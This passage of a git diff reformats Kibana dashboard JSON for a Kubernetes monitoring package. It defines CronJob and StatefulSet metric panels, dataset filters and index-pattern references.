"kubernetes.cronjob.name" + }, + "118dfa8c-388e-430c-860f-ce84cf88ac39": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Epoch Time until Next Schedule(sec)", + "operationType": "median", + "params": { + "format": { + "id": "number", + "params": { + "decimals": 0 + } } + }, + "scale": "ratio", + "sourceField": "kubernetes.cronjob.next_schedule.sec" + }, + "8782d440-1d9a-4826-888b-07cda7c4668a": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Epoch Time since Creation(sec)", + "operationType": "last_value", + "params": { + "format": { + "id": "number", + "params": { + "decimals": 0 + } + }, + "showArrayValues": true, + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "kubernetes.cronjob.created.sec" }, - "title": "CronJobs Informations [Metrics Kubernetes]", - "type": "lens", - "visualizationType": "lnsDatatable" + "e8b720ef-3fec-4c63-8a7a-b64900c938a1": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Epoch Time since Last Schedule(sec)", + "operationType": "last_value", + "params": { + "format": { + "id": "number", + "params": { + "decimals": 0 + } + }, + "showArrayValues": true, + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "kubernetes.cronjob.last_schedule.sec" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "204eb33a-97ff-4d38-bee0-d93387164ab1", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "kubernetes.state_cronjob" }, - "enhancements": {}, - "hidePanelTitles": false - }, - "gridData": { - "h": 14, - "i": "10f9719c-1b46-4561-b8cf-f3cd3ee69c10", - "w": 48, - "x": 0, - "y": 7 - }, - "panelIndex": "10f9719c-1b46-4561-b8cf-f3cd3ee69c10", - "title": "CronJobs Informations [Metrics Kubernetes]", - "type": "lens", - "version": "8.10.2" - } - ], - "timeRestore": false, - "title": "[Metrics Kubernetes] Cronjobs", - "version": 1 - }, - "coreMigrationVersion": "8.8.0", - "created_at": "2023-11-02T11:54:35.308Z", - "id": "kubernetes-0a672d50-bcb1-11ec-b64f-7dd6e8e82013", - "managed": false, - "references": [ - { - "id": "metrics-*", - "name": "37b56399-4cec-4d72-9e9e-e87cbe2d581f:indexpattern-datasource-layer-50909abf-3224-4a23-9b48-e80ea170fa2c", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "37b56399-4cec-4d72-9e9e-e87cbe2d581f:d5426f2b-4d1b-4499-ad29-0851bdce599b", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "10f9719c-1b46-4561-b8cf-f3cd3ee69c10:indexpattern-datasource-layer-7711169c-3a7b-4071-98d0-3644aa1dde0b", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "10f9719c-1b46-4561-b8cf-f3cd3ee69c10:204eb33a-97ff-4d38-bee0-d93387164ab1", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "controlGroup_adf38acd-ecc8-48b2-b7f3-d6dfd024e46b:optionsListDataView", - "type": "index-pattern" + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "kubernetes.state_cronjob" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "columns": [ + { + "columnId": "0ef9858e-46db-48c0-ae7c-4da231c9744b", + "isTransposed": false + }, + { + "columnId": "8782d440-1d9a-4826-888b-07cda7c4668a", + "isTransposed": false + }, + { + "columnId": "e8b720ef-3fec-4c63-8a7a-b64900c938a1", + "isTransposed": false + }, + { + "columnId": "118dfa8c-388e-430c-860f-ce84cf88ac39", + "isTransposed": false + } + ], + "layerId": "7711169c-3a7b-4071-98d0-3644aa1dde0b", + "layerType": "data", + "rowHeight": "single", + "rowHeightLines": 1 + } + }, + "title": "CronJobs Informations [Metrics Kubernetes]", + "type": "lens", + "visualizationType": "lnsDatatable" + }, + "enhancements": {}, + "hidePanelTitles": false }, - { - "id": "metrics-*", - "name": "controlGroup_3e873627-001d-47c7-91a8-995014b0ef90:optionsListDataView", - "type": "index-pattern" + "gridData": { + "h": 14, + "i": "10f9719c-1b46-4561-b8cf-f3cd3ee69c10", + "w": 48, + "x": 0, + "y": 7 }, - { - "id": "metrics-*", - "name": "controlGroup_f4b8cf46-4644-4713-872d-dccc4aeb1e44:optionsListDataView", - "type": "index-pattern" - } + "panelIndex": "10f9719c-1b46-4561-b8cf-f3cd3ee69c10", + "title": "CronJobs Informations [Metrics Kubernetes]", + "type": "lens", + "version": "8.10.2" + } ], - "type": "dashboard", - "typeMigrationVersion": "8.9.0" + "timeRestore": false, + "title": "[Metrics Kubernetes] Cronjobs", + "version": 1 + }, + "references": [ + { + "id": "metrics-*", + "name": "37b56399-4cec-4d72-9e9e-e87cbe2d581f:indexpattern-datasource-layer-50909abf-3224-4a23-9b48-e80ea170fa2c", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "37b56399-4cec-4d72-9e9e-e87cbe2d581f:d5426f2b-4d1b-4499-ad29-0851bdce599b", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "10f9719c-1b46-4561-b8cf-f3cd3ee69c10:indexpattern-datasource-layer-7711169c-3a7b-4071-98d0-3644aa1dde0b", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "10f9719c-1b46-4561-b8cf-f3cd3ee69c10:204eb33a-97ff-4d38-bee0-d93387164ab1", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "controlGroup_adf38acd-ecc8-48b2-b7f3-d6dfd024e46b:optionsListDataView", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "controlGroup_3e873627-001d-47c7-91a8-995014b0ef90:optionsListDataView", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "controlGroup_f4b8cf46-4644-4713-872d-dccc4aeb1e44:optionsListDataView", + "type": "index-pattern" + } + ], + "managed": false, + "coreMigrationVersion": "8.8.0", + "typeMigrationVersion": "8.9.0" } \ No newline at end of file diff --git a/packages/kubernetes/kibana/dashboard/kubernetes-21694370-bcb2-11ec-b64f-7dd6e8e82013.json b/packages/kubernetes/kibana/dashboard/kubernetes-21694370-bcb2-11ec-b64f-7dd6e8e82013.json index 8d60beea3da..a9c7c65f888 100644 --- a/packages/kubernetes/kibana/dashboard/kubernetes-21694370-bcb2-11ec-b64f-7dd6e8e82013.json +++ b/packages/kubernetes/kibana/dashboard/kubernetes-21694370-bcb2-11ec-b64f-7dd6e8e82013.json @@ -1,1040 +1,1048 @@ { - "attributes": { - "controlGroupInput": { - "chainingSystem": "HIERARCHICAL", - "controlStyle": "twoLine", - "ignoreParentSettingsJSON": "{\"ignoreFilters\":false,\"ignoreQuery\":false,\"ignoreTimerange\":false,\"ignoreValidations\":false}", - "panelsJSON": "{\"5f6614ff-57c0-400e-8350-47e86ad5c77f\":{\"order\":0,\"width\":\"medium\",\"grow\":true,\"type\":\"optionsListControl\",\"explicitInput\":{\"fieldName\":\"orchestrator.cluster.name\",\"title\":\"Cluster Name\",\"id\":\"5f6614ff-57c0-400e-8350-47e86ad5c77f\",\"enhancements\":{}}},\"6faac538-d3fd-4f77-85cc-3b7171c7144c\":{\"order\":1,\"width\":\"medium\",\"grow\":true,\"type\":\"optionsListControl\",\"explicitInput\":{\"fieldName\":\"kubernetes.namespace\",\"title\":\"Namespace Name\",\"id\":\"6faac538-d3fd-4f77-85cc-3b7171c7144c\",\"enhancements\":{}}},\"82c41492-acf8-4b51-bba9-ec54c99fb1ba\":{\"order\":2,\"width\":\"medium\",\"grow\":true,\"type\":\"optionsListControl\",\"explicitInput\":{\"fieldName\":\"kubernetes.statefulset.name\",\"title\":\"StatefulSet Name\",\"id\":\"82c41492-acf8-4b51-bba9-ec54c99fb1ba\",\"enhancements\":{}}}}" - }, - "description": "Metrics about StatefulSets", - "kibanaSavedObjectMeta": { - "searchSourceJSON": { + "id": "kubernetes-21694370-bcb2-11ec-b64f-7dd6e8e82013", + "type": "dashboard", + "namespaces": [ + "default" + ], + "migrationVersion": { + "dashboard": "8.9.0" + }, + "updated_at": "2024-03-13T10:46:00.096Z", + "created_at": "2024-03-13T10:46:00.096Z", + "version": "WzI0NCwyXQ==", + "attributes": { + "controlGroupInput": { + "chainingSystem": "HIERARCHICAL", + "controlStyle": "twoLine", + "ignoreParentSettingsJSON": "{\"ignoreFilters\":false,\"ignoreQuery\":false,\"ignoreTimerange\":false,\"ignoreValidations\":false}", + "panelsJSON": "{\"5f6614ff-57c0-400e-8350-47e86ad5c77f\":{\"order\":0,\"width\":\"medium\",\"grow\":true,\"type\":\"optionsListControl\",\"explicitInput\":{\"fieldName\":\"orchestrator.cluster.name\",\"title\":\"Cluster Name\",\"id\":\"5f6614ff-57c0-400e-8350-47e86ad5c77f\",\"enhancements\":{}}},\"6faac538-d3fd-4f77-85cc-3b7171c7144c\":{\"order\":1,\"width\":\"medium\",\"grow\":true,\"type\":\"optionsListControl\",\"explicitInput\":{\"fieldName\":\"kubernetes.namespace\",\"title\":\"Namespace Name\",\"id\":\"6faac538-d3fd-4f77-85cc-3b7171c7144c\",\"enhancements\":{}}},\"82c41492-acf8-4b51-bba9-ec54c99fb1ba\":{\"order\":2,\"width\":\"medium\",\"grow\":true,\"type\":\"optionsListControl\",\"explicitInput\":{\"fieldName\":\"kubernetes.statefulset.name\",\"title\":\"StatefulSet Name\",\"id\":\"82c41492-acf8-4b51-bba9-ec54c99fb1ba\",\"enhancements\":{}}}}" + }, + "description": "Metrics about StatefulSets", + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "optionsJSON": { + "hidePanelTitles": false, + "syncColors": false, + "syncCursor": true, + "syncTooltips": false, + "useMargins": true + }, + "panelsJSON": [ + { + "embeddableConfig": { + "enhancements": {}, + "savedVis": { + "data": { + "aggs": [], + "searchSource": { "filter": [], "query": { - "language": "kuery", - "query": "" + "language": "kuery", + "query": "" } - } + } + }, + "description": "", + "params": { + "fontSize": 10, + "markdown": "[Kubernetes Overview](#/view/kubernetes-f4dc26db-1b53-4ea2-a78b-1bfab8ea267c),\n[Kubernetes Nodes](#/view/kubernetes-b945b7b0-bcb1-11ec-b64f-7dd6e8e82013), \n[Kubernetes Pods](#/view/kubernetes-3d4d9290-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes Deployments](#/view/kubernetes-5be46210-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes StatefulSets](#/view/kubernetes-21694370-bcb2-11ec-b64f-7dd6e8e82013), [Kubernetes DaemonSets](#/view/kubernetes-85879010-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes CronJobs](#/view/kubernetes-0a672d50-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes Jobs](#/view/kubernetes-9bf990a0-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes Volumes](#/view/kubernetes-3912d9a0-bcb2-11ec-b64f-7dd6e8e82013), [Kubernetes PV/PVC](#/view/kubernetes-dd081350-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes Services](#/view/kubernetes-ff1b3850-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes API Server](#/view/kubernetes-d3bd9650-0c14-11ed-b760-5d1bccb47f56), [Kubernetes Proxy](#/view/kubernetes-5e649d60-9901-11e9-ba57-b7ab4e2d4b58)", + "openLinksInNewTab": false + }, + "title": "", + "type": "markdown", + "uiState": {} + } }, - "optionsJSON": { - "hidePanelTitles": false, - "syncColors": false, - "syncCursor": true, - "syncTooltips": false, - "useMargins": true + "gridData": { + "h": 4, + "i": "f1e8f8c6-d644-4b1d-a7bc-fe631c232a57", + "w": 48, + "x": 0, + "y": 0 }, - "panelsJSON": [ - { - "embeddableConfig": { - "enhancements": {}, - "savedVis": { - "data": { - "aggs": [], - "searchSource": { - "filter": [], - "query": { - "language": "kuery", - "query": "" - } - } - }, - "description": "", - "params": { - "fontSize": 10, - "markdown": "[Kubernetes Overview](#/view/kubernetes-f4dc26db-1b53-4ea2-a78b-1bfab8ea267c),\n[Kubernetes Nodes](#/view/kubernetes-b945b7b0-bcb1-11ec-b64f-7dd6e8e82013), \n[Kubernetes Pods](#/view/kubernetes-3d4d9290-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes Deployments](#/view/kubernetes-5be46210-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes StatefulSets](#/view/kubernetes-21694370-bcb2-11ec-b64f-7dd6e8e82013), [Kubernetes DaemonSets](#/view/kubernetes-85879010-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes CronJobs](#/view/kubernetes-0a672d50-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes Jobs](#/view/kubernetes-9bf990a0-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes Volumes](#/view/kubernetes-3912d9a0-bcb2-11ec-b64f-7dd6e8e82013), [Kubernetes PV/PVC](#/view/kubernetes-dd081350-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes Services](#/view/kubernetes-ff1b3850-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes API Server](#/view/kubernetes-d3bd9650-0c14-11ed-b760-5d1bccb47f56), [Kubernetes Proxy](#/view/kubernetes-5e649d60-9901-11e9-ba57-b7ab4e2d4b58)", - "openLinksInNewTab": false + "panelIndex": "f1e8f8c6-d644-4b1d-a7bc-fe631c232a57", + "title": "Kubernetes Dashboards [Metrics Kubernetes]", + "type": "visualization", + "version": "8.10.2" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-1e1f286b-da16-49ab-8ad6-cef60c577ce5", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "988215de-1bb2-4dd7-91a4-a07d3d436b89", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "1e1f286b-da16-49ab-8ad6-cef60c577ce5": { + "columnOrder": [ + "ccb9ef58-565b-4ffe-bb2e-60819199ccfc", + "615a6b08-bc26-4d84-8c18-7a9936cabbfb" + ], + "columns": { + "615a6b08-bc26-4d84-8c18-7a9936cabbfb": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "\"kubernetes.statefulset.replicas.observed\": *" + }, + "isBucketed": false, + "label": "Replicas Observed ", + "operationType": "last_value", + "params": { + "showArrayValues": false, + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "kubernetes.statefulset.replicas.observed" }, - "title": "", - "type": "markdown", - "uiState": {} - } - }, - "gridData": { - "h": 4, - "i": "f1e8f8c6-d644-4b1d-a7bc-fe631c232a57", - "w": 48, - "x": 0, - "y": 0 - }, - "panelIndex": "f1e8f8c6-d644-4b1d-a7bc-fe631c232a57", - "title": "Kubernetes Dashboards [Metrics Kubernetes]", - "type": "visualization", - "version": "8.10.2" - }, - { - "embeddableConfig": { - "attributes": { - "description": "", - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-1e1f286b-da16-49ab-8ad6-cef60c577ce5", - "type": "index-pattern" + "ccb9ef58-565b-4ffe-bb2e-60819199ccfc": { + "dataType": "string", + "isBucketed": true, + "label": "Top 10000 values of kubernetes.statefulset.name", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderAgg": { + "dataType": "number", + "isBucketed": false, + "label": "Count of records", + "operationType": "count", + "params": {}, + "scale": "ratio", + "sourceField": "___records___" }, - { - "id": "metrics-*", - "name": "988215de-1bb2-4dd7-91a4-a07d3d436b89", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "1e1f286b-da16-49ab-8ad6-cef60c577ce5": { - "columnOrder": [ - "ccb9ef58-565b-4ffe-bb2e-60819199ccfc", - "615a6b08-bc26-4d84-8c18-7a9936cabbfb" - ], - "columns": { - "615a6b08-bc26-4d84-8c18-7a9936cabbfb": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "\"kubernetes.statefulset.replicas.observed\": *" - }, - "isBucketed": false, - "label": "Replicas Observed ", - "operationType": "last_value", - "params": { - "showArrayValues": false, - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "kubernetes.statefulset.replicas.observed" - }, - "ccb9ef58-565b-4ffe-bb2e-60819199ccfc": { - "dataType": "string", - "isBucketed": true, - "label": "Top 10000 values of kubernetes.statefulset.name", - "operationType": "terms", - "params": { - "exclude": [], - "excludeIsRegex": false, - "include": [], - "includeIsRegex": false, - "missingBucket": false, - "orderAgg": { - "dataType": "number", - "isBucketed": false, - "label": "Count of records", - "operationType": "count", - "params": {}, - "scale": "ratio", - "sourceField": "___records___" - }, - "orderBy": { - "type": "custom" - }, - "orderDirection": "desc", - "otherBucket": false, - "parentFormat": { - "id": "terms" - }, - "secondaryFields": [], - "size": 10000 - }, - "scale": "ordinal", - "sourceField": "kubernetes.statefulset.name" - } - }, - "ignoreGlobalFilters": false, - "incompleteColumns": {} - } - } - }, - "indexpattern": { - "layers": {} - }, - "textBased": { - "layers": {} - } + "orderBy": { + "type": "custom" }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "field": "data_stream.dataset", - "index": "988215de-1bb2-4dd7-91a4-a07d3d436b89", - "key": "data_stream.dataset", - "negate": false, - "params": { - "query": "kubernetes.state_statefulset" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "data_stream.dataset": "kubernetes.state_statefulset" - } - } - } - ], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" }, - "visualization": { - "breakdownByAccessor": "ccb9ef58-565b-4ffe-bb2e-60819199ccfc", - "collapseFn": "sum", - "layerId": "1e1f286b-da16-49ab-8ad6-cef60c577ce5", - "layerType": "data", - "metricAccessor": "615a6b08-bc26-4d84-8c18-7a9936cabbfb" - } - }, - "title": "StatefulSet Replicas Observed [Metrics Kubernetes]", - "type": "lens", - "visualizationType": "lnsMetric" - }, - "enhancements": {}, - "hidePanelTitles": true + "secondaryFields": [], + "size": 10000 + }, + "scale": "ordinal", + "sourceField": "kubernetes.statefulset.name" + } + }, + "ignoreGlobalFilters": false, + "incompleteColumns": {} + } + } }, - "gridData": { - "h": 7, - "i": "d8265dae-829d-434f-a826-cc6062edfd3a", - "w": 9, - "x": 0, - "y": 4 + "indexpattern": { + "layers": {} }, - "panelIndex": "d8265dae-829d-434f-a826-cc6062edfd3a", - "type": "lens", - "version": "8.10.2" + "textBased": { + "layers": {} + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "988215de-1bb2-4dd7-91a4-a07d3d436b89", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "kubernetes.state_statefulset" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "kubernetes.state_statefulset" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "breakdownByAccessor": "ccb9ef58-565b-4ffe-bb2e-60819199ccfc", + "collapseFn": "sum", + "layerId": "1e1f286b-da16-49ab-8ad6-cef60c577ce5", + "layerType": "data", + "metricAccessor": "615a6b08-bc26-4d84-8c18-7a9936cabbfb" + } }, - { - "embeddableConfig": { - "attributes": { - "description": "", - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-37f25d48-9b81-419c-8a8b-e5daea0230d0", - "type": "index-pattern" + "title": "StatefulSet Replicas Observed [Metrics Kubernetes]", + "type": "lens", + "visualizationType": "lnsMetric" + }, + "enhancements": {}, + "hidePanelTitles": true + }, + "gridData": { + "h": 7, + "i": "d8265dae-829d-434f-a826-cc6062edfd3a", + "w": 9, + "x": 0, + "y": 4 + }, + "panelIndex": "d8265dae-829d-434f-a826-cc6062edfd3a", + "type": "lens", + "version": "8.10.2" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-37f25d48-9b81-419c-8a8b-e5daea0230d0", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "3fbf4162-1133-4eee-ad35-334b047efd3d", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "37f25d48-9b81-419c-8a8b-e5daea0230d0": { + "columnOrder": [ + "6ff73cdb-7c0e-4edc-8fd4-8ff784a137c1", + "7711a519-3a8d-4474-9efb-622dd7d57cdd" + ], + "columns": { + "6ff73cdb-7c0e-4edc-8fd4-8ff784a137c1": { + "dataType": "string", + "isBucketed": true, + "label": "Top 10000 values of kubernetes.statefulset.name", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderAgg": { + "dataType": "number", + "isBucketed": false, + "label": "Count of records", + "operationType": "count", + "params": {}, + "scale": "ratio", + "sourceField": "___records___" }, - { - "id": "metrics-*", - "name": "3fbf4162-1133-4eee-ad35-334b047efd3d", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "37f25d48-9b81-419c-8a8b-e5daea0230d0": { - "columnOrder": [ - "6ff73cdb-7c0e-4edc-8fd4-8ff784a137c1", - "7711a519-3a8d-4474-9efb-622dd7d57cdd" - ], - "columns": { - "6ff73cdb-7c0e-4edc-8fd4-8ff784a137c1": { - "dataType": "string", - "isBucketed": true, - "label": "Top 10000 values of kubernetes.statefulset.name", - "operationType": "terms", - "params": { - "exclude": [], - "excludeIsRegex": false, - "include": [], - "includeIsRegex": false, - "missingBucket": false, - "orderAgg": { - "dataType": "number", - "isBucketed": false, - "label": "Count of records", - "operationType": "count", - "params": {}, - "scale": "ratio", - "sourceField": "___records___" - }, - "orderBy": { - "type": "custom" - }, - "orderDirection": "desc", - "otherBucket": false, - "parentFormat": { - "id": "terms" - }, - "secondaryFields": [], - "size": 10000 - }, - "scale": "ordinal", - "sourceField": "kubernetes.statefulset.name" - }, - "7711a519-3a8d-4474-9efb-622dd7d57cdd": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "\"kubernetes.statefulset.replicas.desired\": *" - }, - "isBucketed": false, - "label": "Replicas Desired", - "operationType": "last_value", - "params": { - "showArrayValues": false, - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "kubernetes.statefulset.replicas.desired" - } - }, - "ignoreGlobalFilters": false, - "incompleteColumns": {} - } - } - }, - "indexpattern": { - "layers": {} - }, - "textBased": { - "layers": {} - } + "orderBy": { + "type": "custom" }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "field": "data_stream.dataset", - "index": "3fbf4162-1133-4eee-ad35-334b047efd3d", - "key": "data_stream.dataset", - "negate": false, - "params": { - "query": "kubernetes.state_statefulset" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "data_stream.dataset": "kubernetes.state_statefulset" - } - } - } - ], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" }, - "visualization": { - "breakdownByAccessor": "6ff73cdb-7c0e-4edc-8fd4-8ff784a137c1", - "collapseFn": "sum", - "layerId": "37f25d48-9b81-419c-8a8b-e5daea0230d0", - "layerType": "data", - "metricAccessor": "7711a519-3a8d-4474-9efb-622dd7d57cdd" - } + "secondaryFields": [], + "size": 10000 + }, + "scale": "ordinal", + "sourceField": "kubernetes.statefulset.name" }, - "title": "StatefulSet Replicas Desired [Metrics Kubernetes]", - "type": "lens", - "visualizationType": "lnsMetric" - }, - "enhancements": {}, - "hidePanelTitles": true + "7711a519-3a8d-4474-9efb-622dd7d57cdd": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "\"kubernetes.statefulset.replicas.desired\": *" + }, + "isBucketed": false, + "label": "Replicas Desired", + "operationType": "last_value", + "params": { + "showArrayValues": false, + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "kubernetes.statefulset.replicas.desired" + } + }, + "ignoreGlobalFilters": false, + "incompleteColumns": {} + } + } }, - "gridData": { - "h": 7, - "i": "21039d12-cc17-4089-9d8f-3c62018c8f1c", - "w": 10, - "x": 9, - "y": 4 + "indexpattern": { + "layers": {} }, - "panelIndex": "21039d12-cc17-4089-9d8f-3c62018c8f1c", - "type": "lens", - "version": "8.10.2" + "textBased": { + "layers": {} + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "3fbf4162-1133-4eee-ad35-334b047efd3d", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "kubernetes.state_statefulset" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "kubernetes.state_statefulset" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "breakdownByAccessor": "6ff73cdb-7c0e-4edc-8fd4-8ff784a137c1", + "collapseFn": "sum", + "layerId": "37f25d48-9b81-419c-8a8b-e5daea0230d0", + "layerType": "data", + "metricAccessor": "7711a519-3a8d-4474-9efb-622dd7d57cdd" + } }, - { - "embeddableConfig": { - "attributes": { - "description": "", - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-c5fc4b20-ec0c-46c3-aaf8-96970b768d34", - "type": "index-pattern" + "title": "StatefulSet Replicas Desired [Metrics Kubernetes]", + "type": "lens", + "visualizationType": "lnsMetric" + }, + "enhancements": {}, + "hidePanelTitles": true + }, + "gridData": { + "h": 7, + "i": "21039d12-cc17-4089-9d8f-3c62018c8f1c", + "w": 10, + "x": 9, + "y": 4 + }, + "panelIndex": "21039d12-cc17-4089-9d8f-3c62018c8f1c", + "type": "lens", + "version": "8.10.2" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-c5fc4b20-ec0c-46c3-aaf8-96970b768d34", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "778d517a-5fab-4174-8f76-966de3e4452a", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "c5fc4b20-ec0c-46c3-aaf8-96970b768d34": { + "columnOrder": [ + "b58f63d6-4d40-4b42-a746-9f5f96efdcae", + "d50dac83-e42b-4ef8-9048-d2c8a737334b" + ], + "columns": { + "b58f63d6-4d40-4b42-a746-9f5f96efdcae": { + "dataType": "string", + "isBucketed": true, + "label": "Top 10000 values of kubernetes.statefulset.name", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderAgg": { + "dataType": "number", + "isBucketed": false, + "label": "Count of records", + "operationType": "count", + "params": {}, + "scale": "ratio", + "sourceField": "___records___" }, - { - "id": "metrics-*", - "name": "778d517a-5fab-4174-8f76-966de3e4452a", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "c5fc4b20-ec0c-46c3-aaf8-96970b768d34": { - "columnOrder": [ - "b58f63d6-4d40-4b42-a746-9f5f96efdcae", - "d50dac83-e42b-4ef8-9048-d2c8a737334b" - ], - "columns": { - "b58f63d6-4d40-4b42-a746-9f5f96efdcae": { - "dataType": "string", - "isBucketed": true, - "label": "Top 10000 values of kubernetes.statefulset.name", - "operationType": "terms", - "params": { - "exclude": [], - "excludeIsRegex": false, - "include": [], - "includeIsRegex": false, - "missingBucket": false, - "orderAgg": { - "dataType": "number", - "isBucketed": false, - "label": "Count of records", - "operationType": "count", - "params": {}, - "scale": "ratio", - "sourceField": "___records___" - }, - "orderBy": { - "type": "custom" - }, - "orderDirection": "desc", - "otherBucket": false, - "parentFormat": { - "id": "terms" - }, - "secondaryFields": [], - "size": 10000 - }, - "scale": "ordinal", - "sourceField": "kubernetes.statefulset.name" - }, - "d50dac83-e42b-4ef8-9048-d2c8a737334b": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "\"kubernetes.statefulset.replicas.ready\": *" - }, - "isBucketed": false, - "label": "Replicas Ready ", - "operationType": "last_value", - "params": { - "showArrayValues": false, - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "kubernetes.statefulset.replicas.ready" - } - }, - "ignoreGlobalFilters": false, - "incompleteColumns": {} - } - } - }, - "indexpattern": { - "layers": {} - }, - "textBased": { - "layers": {} - } + "orderBy": { + "type": "custom" }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "field": "data_stream.dataset", - "index": "778d517a-5fab-4174-8f76-966de3e4452a", - "key": "data_stream.dataset", - "negate": false, - "params": { - "query": "kubernetes.state_statefulset" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "data_stream.dataset": "kubernetes.state_statefulset" - } - } - } - ], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" }, - "visualization": { - "breakdownByAccessor": "b58f63d6-4d40-4b42-a746-9f5f96efdcae", - "collapseFn": "sum", - "layerId": "c5fc4b20-ec0c-46c3-aaf8-96970b768d34", - "layerType": "data", - "metricAccessor": "d50dac83-e42b-4ef8-9048-d2c8a737334b" - } + "secondaryFields": [], + "size": 10000 + }, + "scale": "ordinal", + "sourceField": "kubernetes.statefulset.name" }, - "title": "StatefulSet Replicas Ready [Metrics Kubernetes]", - "type": "lens", - 